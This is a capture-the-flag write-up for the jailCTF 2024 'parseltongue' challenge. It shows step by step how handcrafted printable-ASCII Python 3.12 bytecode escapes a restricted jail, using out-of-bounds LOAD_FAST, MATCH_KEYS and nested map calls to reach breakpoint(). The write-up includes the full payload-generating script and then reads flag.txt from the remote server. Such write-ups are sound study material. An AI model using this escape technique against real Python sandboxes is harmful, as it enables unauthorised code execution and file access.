parseltongue
Write-up for parseltongue from jailCTF 2024, a particularly tricky Python capture-the-flag challenge.
The task
Read flag.txt
on a server running the following Python code:
#!/usr/local/bin/python
from os import __dict__
value = input("speak to me > ")
code = input("your code > ")
assert all(32 <= ord(x) < 127 for x in code), 'cant read this'
def f():
pass
f.__code__ = f.__code__.replace(co_names=(), co_code=code.encode())
f()
We need to execute remote code, by crafting some Python bytecode that only uses printable ASCII bytes.
(Yes, I’ve seen that one Tom 7 video. It’s really good!)
My approach does not use os.__dict__
or the value
string. I will essentially escape an even more restrictive, minimalist jail:
#!/usr/local/bin/python
code = input("your code > ")
assert all(32 <= ord(x) < 127 for x in code)
def f():
pass
f.__code__ = f.__code__.replace(co_names=(), co_code=code.encode())
f()
Python bytecode
Python functions are compiled into bytecode that we can disassemble with the dis
module.
Python 3.12.0 (tags/v3.12.0:0fb18b0, Oct 2 2023, 13:03:39)
Type "help", "copyright", "credits" or "license" for more information.
>>> import dis
>>> def f(x):
... return x+x
...
>>> dis.dis(f)
1 0 RESUME 0
2 2 LOAD_FAST 0 (x)
4 LOAD_FAST 0 (x)
6 BINARY_OP 0 (+)
10 RETURN_VALUE
This bytecode is run by Python’s stack-based virtual machine. Its format varies heavily between minor versions of Python. This challenge used Python 3.12.
As you can see from the offsets in the second column, every instruction is two bytes: an opcode and an operand. For instructions that don't need an operand, like RETURN_VALUE
(which returns the top item of the stack), the second byte is ignored.
BINARY_OP
is just the opcode’s name, but we can use dis
to check its byte representation, and hence, ASCII-friendliness.
>>> dis.opmap["BINARY_OP"]
122
The restriction imposed by this challenge is twofold. Clearly, we can only use instructions with opcodes in range(32, 127)
. But for another, the operands must be in that range as well.
Thus, we can’t swap the top two elements on the stack, as that would be SWAP(1)
. We can do a SWAP(34)
, which swaps stack[-1]
and stack[-34]
.
We’ll also see that we can’t easily do anything like push numbers or strings to the stack. f
is a barren wasteland: there are no constants, locals, or globals we can refer to. We can’t access attributes of things on the stack, either, because co_names
is empty as well. So what can we even do?
Hey, wait, scroll back up a little. Where's the instruction with byte offset 8
?
Secret characters
The point of all this is that at first, I thought I only had these instructions available to me…
>>> [k for k,v in dis.opmap.items() if 32 <= v < 127]
['MATCH_SEQUENCE', 'MATCH_KEYS', 'PUSH_EXC_INFO', 'CHECK_EXC_MATCH', 'CHECK_EG_MATCH', 'WITH_EXCEPT_START', 'GET_AITER', 'GET_ANEXT', 'BEFORE_ASYNC_WITH', 'BEFORE_WITH', ...]
But there are also these secret “specialized” opcodes, like the aforementioned BINARY_OP_ADD_UNICODE
, whose names are absent from the documentation and hiding in dis._all_opmap
instead of dis.opmap
(sigh). I wouldn’t have figured this out without a hint from the organizers.
>>> [k for k,v in dis._all_opmap.items() if 32 <= v < 127 and k not in dis.opmap]
['CALL_BUILTIN_FAST_WITH_KEYWORDS', 'CALL_METHOD_DESCRIPTOR_FAST_WITH_KEYWORDS', 'CALL_NO_KW_BUILTIN_FAST', 'CALL_NO_KW_BUILTIN_O', 'CALL_NO_KW_ISINSTANCE', 'CALL_NO_KW_LEN', ...]
I’m normal… I promise
When working on the solution, I thought about the ASCII characters more than about their “real” names, because I don’t really have past experience with Python bytecode. Modifying this bytecode by hand was like writing GolfScript or APL, which I've done plenty. Oh, and I decided that whenever the second byte of an instruction is ignored (because it doesn't need an operand), I'll use a semicolon.
For example: the decimal value of the opcode GET_ITER
is 68. In ASCII, 68 encodes D
, so I'd write that as D;
in my code. The organizers really loved this.
Programming in Parseltongue
Let’s get a taste of what we can do. We’ll need to combine the available opcodes in clever ways to manipulate values on the stack. These are small puzzles, so let’s tackle them first.
Pop
We can’t use POP_TOP
, because its opcode byte is 1. To pop the stack, I ended up using Y;
(POP_EXCEPT
). But this would eventually cause a segfault, maybe because Python doesn't like non-exceptions being set as the exception state for too long? So, I use #;Y;Y;
to tuck an actual exception state under the top of stack, then pop twice.
#; PUSH_EXC_INFO
V
. Push the “last exception” to the stack, then push V
again. The second byte is ignored.
Y; POP_EXCEPT
Dup and swap
We’ll want to duplicate the top-of-stack sometimes, or swap elements around. The opcodes we’d normally use for that are available, but we can only target elements deep down the stack:
xn COPY
stack[-n]
.
cn SWAP
stack[-1]
and stack[-n]
.
With ASCII operands, we can COPY(32)
or SWAP(33)
, but not COPY(1)
. Fortunately, there’s an opcode to just push some garbage to the stack, so we can create the distance we need, and then close it again:
J; LOAD_ASSERTION_ERROR
AssertionError
to the stack.The second byte is ignored.
For example, to duplicate the top of stack, we can push 32 garbage elements, then COPY(33)
, then SWAP(33)
, then pop 32 times.
We’re ready to look at our first piece of Parseltongue code. Behold, DUP
:
J;J;J;J;J;J;J;J; J;J;J;J;J;J;J;J; J;J;J;J;J;J;J;J; J;J;J;J;J;J;J;J;
Push 32 AssertionErrors. They will be stack[-32] through stack[-1].x!
Copy stack[-33] to the top:ord("!") == 33
c!
Swap stack[-1] (our copy) with stack[-33] (an AssertionError).#;Y;Y;#;Y;Y;#;Y;Y;#;Y;Y; #;Y;Y;#;Y;Y;#;Y;Y;#;Y;Y; #;Y;Y;#;Y;Y;#;Y;Y;#;Y;Y; #;Y;Y;#;Y;Y;#;Y;Y;#;Y;Y; #;Y;Y;#;Y;Y;#;Y;Y;#;Y;Y; #;Y;Y;#;Y;Y;#;Y;Y;#;Y;Y; #;Y;Y;#;Y;Y;#;Y;Y;#;Y;Y; #;Y;Y;#;Y;Y;#;Y;Y;#;Y;Y;
Pop 32 AssertionErrors.
Getting functions on the stack
One of the opcodes we saw earlier for loading function arguments,
LOAD_FAST
, is actually so fast that it doesn’t
perform any bounds-checking, and so something like
LOAD_FAST(42)
might reach into the murky depths of memory and
pull a reference to __builtins__.__dict__
onto the
stack.
This is totally bogus, but it works reliably on the host machine and in the Docker container provided by the organizers, so, works for me.
|n LOAD_FAST
co_varnames[n]
onto the stack, without bounds checking.
}n STORE_FAST
co_varnames[n]
, without bounds checking.
(These guys combine to make a far shorter DUP
alternative: something like }z|z|z
should work. But it involves writing out-of-bounds, and this would also cause segfaults sometimes, so I settled for the much more roundabout DUP
described earlier.)
This is nice. A common way to solve Python CTF challenges is to call breakpoint()
, which opens the debugger and lets us read the flag.txt file from there. So we just need to extract the right value from the builtins dict and call it.
Smashing open a dict
As we saw earlier, we have no way of pushing strings. Also, none of the opcodes for a[b]
are
ASCII-friendly anyway:
>>> [print(v,k) for k,v in dis._all_opmap.items() if "BINARY_SUBSCR" in k]
25 BINARY_SUBSCR
19 BINARY_SUBSCR_DICT
20 BINARY_SUBSCR_GETITEM
21 BINARY_SUBSCR_LIST_INT
22 BINARY_SUBSCR_TUPLE_INT
So how do we get the values?
To pull keys out of a dict on top of the stack, we can use UNPACK_EX
, the Python bytecode instruction that implements starred assignments.
^n UNPACK_EX
L
. Perform a "starred assignment":y1, …, yn, *rest = L
rest
, then yn
through y1
.
Luckily, our builtins dict is big enough that we can provide a large, ASCII-friendly operand number. Any largeish number will do, but let's use x
(120).
This way, we don’t have to specify the names of the things we want: we just get all the names on the stack. But then how do we get at the values?
There’s an obscure opcode called MATCH_KEYS
, used in the bytecode translation of statements like case {"a": a, "b": b}:
inside a Python match
block. Here’s how it works:
!; MATCH_KEYS
K
. Pop a dict D
. If all the keys in K
exist in D
, push a tuple of corresponding values. Otherwise, push None
. The second byte is ignored.
Also, we can build tuples on the stack, as long as they are 32-tuples or larger…
fn BUILD_TUPLE
n
values and push a tuple containing them.
A careful combination of these opcodes leaves us with a 120-tuple of builtin functions on the stack.
|*|*
LOAD_FAST out-of-bounds to push the builtins dict twice.^x
Perform a starred assignment with ord("x") = 120 variables.
This pushes `rest`, then k120, then k119 ... then k1.cy
Swap stack[-121] (`rest`) and stack[-1] (k1).#;Y;Y;
Pop `rest`.fx
Make a tuple out of 120 keys.!;
MATCH_KEYS with the original dict to get 120 values.^x
Perform starred assignment again to dump the values to the stack.
The order of the keys seemed to be the same each time. So at this point, I could swap and pop things in a careful order to leave me with stack access to whatever functions I want. Let's call breakpoint
!
Calling functions
We can use the specialized opcode
CALL_NO_KW_BUILTIN_FAST
to call a function, taking a callable object and its arguments off the stack.
However, we’re restricted to calling functions with 32 or more arguments.
'n;;;;;; CALL_NO_KW_BUILTIN_FAST
n
arguments. Pop self
. Pop f
.Call f(self, *arguments)
and push the result to the stack.
The cache bytes ;;;;;;
are skipped over.
If we call breakpoint
with 32 arguments, it’ll just throw an error instead of launching the debugger. We really need to call it with 0 arguments somehow.
Here’s one idea: did you know you can call iter with two arguments!? Calling iter(breakpoint, 0)
makes an iterator that calls breakpoint()
when advanced, and we can advance iterators
with the bytecode instruction FOR_ITER
.
]n;; FOR_ITER
next(stack[-1])
. If this produces a value, push it to the stack. (Otherwise, skip ahead by n
bytes — but we never trigger this behavior.)The cache bytes ;;
are skipped over.
Basically, it’s like writing this...
for _ in iter(breakpoint, 0):
pass
But two arguments is still too few.
A ridiculous map() call
Here’s another idea: map
can be called with n +
1 arguments. The n iterables get zipped together, and the
function passed as the first argument receives n arguments at a
time, stopping as soon as one of the iterables stops. For example,
iterating over map(print, 'abc', 'def', 'gh')
will print
a d g
and then b e h
and then stop.
So we can write something like
for a in map(iter, [breakpoint], [0]):
# Now a = iter(breakpoint, 0)
for b in a:
pass
and trigger a breakpoint. But why stop there? We can pass map
to map, like so:
for a in map(map, [iter], [[breakpoint]], [[0]]):
# Now a = map(iter, [breakpoint], [0])
for b in a:
# so b = iter(breakpoint, 0)
for c in b:
# so this triggers the breakpoint
pass
We can repeat this idea to get more and more arguments.
for a in map(map, [map], [[map]], [[[iter]]], [[[[breakpoint]]]], [[[[0]]]]):
for b in a:
for c in b:
for d in c:
for e in d:
pass
Our plan is to call map with 32 arguments, most of which are stupidly nested tuples.
(We don’t exactly have a way to turn x
into [x]
in bytecode, but a 32-tuple of x
and 31 AssertionErrors works just as well. Can you see why?)
Making a blueprint
Knowing that we can run Parseltongue code, and get built-ins on the stack, and make 32-tuples, and call functions with 32 arguments… let’s sketch out our approach in regular Python, first:
J = AssertionError
def wrap(x):
return (x, J(),J(),J(),J(),J(),J(),J(),
J(),J(),J(),J(),J(),J(),J(),J(),
J(),J(),J(),J(),J(),J(),J(),J(),
J(),J(),J(),J(),J(),J(),J(),J())
m0 = map
m1 = wrap(m0); m2 = wrap(m1); m3 = wrap(m2); m4 = wrap(m3)
m5 = wrap(m4); m6 = wrap(m5); m7 = wrap(m6); m8 = wrap(m7)
m9 = wrap(m8); m10 = wrap(m9); m11 = wrap(m10); m12 = wrap(m11)
m13 = wrap(m12); m14 = wrap(m13); m15 = wrap(m14); m16 = wrap(m15)
m17 = wrap(m16); m18 = wrap(m17); m19 = wrap(m18); m20 = wrap(m19)
m21 = wrap(m20); m22 = wrap(m21); m23 = wrap(m22); m24 = wrap(m23)
m25 = wrap(m24); m26 = wrap(m25); m27 = wrap(m26); m28 = wrap(m27)
i = iter
for _ in range(29): i = wrap(i)
b = breakpoint
for _ in range(30): b = wrap(b)
# These arguments are what we want on the stack:
x = map(m0, m1, m2, m3, m4, m5, m6, m7, m8, m9,
m10, m11, m12, m13, m14, m15, m16, m17, m18, m19,
m20, m21, m22, m23, m24, m25, m26, m27, m28, i, b, b)
# Then, we use `FOR_ITER` 31 times:
for _ in range(31): x = next(x)
If you run this program, it actually triggers a breakpoint! You can try it at home.
The translation into bytecode will look like this:
- Conjure up the built-ins, and leave just the ones we need on the stack.
- Use our
DUP
,BUILD_TUPLE
, andSWAP
operations to make the arguments. - Use
CALL_NO_KW_BUILTIN_FAST
to perform the 32-argumentmap
call. - Use
FOR_ITER
to peel off layers ofmap
objects until we get to the breakpoint.
Constructing the bytecode
At this point, we are just putting together everything we know. Instead of bothering to figure out how to write loops in Parseltongue, I just unrolled everything, and my payload ended up being enormous.
# Bytecode to push an AssertionError.
J = b"J;"
# Bytecode to call a function with n arguments.
CALL = lambda n: b"'%c;;;;;;" % (n)
# Turn x into a 32-tuple (x, AssertionError(), AssertionError(), ...)
Z = J*31 + b"f "
# Swap stack[-1] and stack[-n], only using ASCII bytecode.
def SWAP(n):
if n < 33:
return J*32 + bytes([99,32+1,99,32+n,99,32+1]) + POP*32
else:
return bytes([99, n])
DUP = J*31 + b"x " + (SWAP(2) + POP)*31
NEXT = b"D;];;;" + SWAP(2) + POP
# How many layers of map?
k = 33
# Bizarre LOAD magic
code = J + b"|G|G^EfE" + SWAP(2) + POP + b"!;^E"
# Some nonsense that leaves the right builtins on the stack...
# This can totally be optimized, but I didn't bother
code += SWAP(72) + POP
code += SWAP(37) + SWAP(71) + SWAP(69)
code += SWAP(72) + SWAP(70) + SWAP(56) + SWAP(72)
code += SWAP(i) + SWAP(70)
code += POP * 68
# Push m0, m1, m2, m3...
code += DUP + (DUP + Z)*(k-4)
# Get iter on top of the stack and wrap it k-3 times
code += J + SWAP(k+1) + Z*(k-3)
# Get breakpoint on top of the stack and wrap it k-2 times
code += J + SWAP(k+3) + Z*(k-2)
# It doesn't matter what the last thing we push is, but wrap it k-2 times.
code += J + Z*(k-2)
# Trigger a remote breakpoint!! And return.
code += CALL(k-1) + NEXT*(k-1) + b"S;"
print(submit(code))
All I had to do now was modify my socket
wrapper to run open("flag.txt").read()
as soon as it's inside the Python debugger, and then point it at the actual remote jail server.
It has taken over 12 hours of bytecode puzzling and pulling my hair out — but I was looking at the flag string! I was the only participant in the CTF who ended up solving this challenge.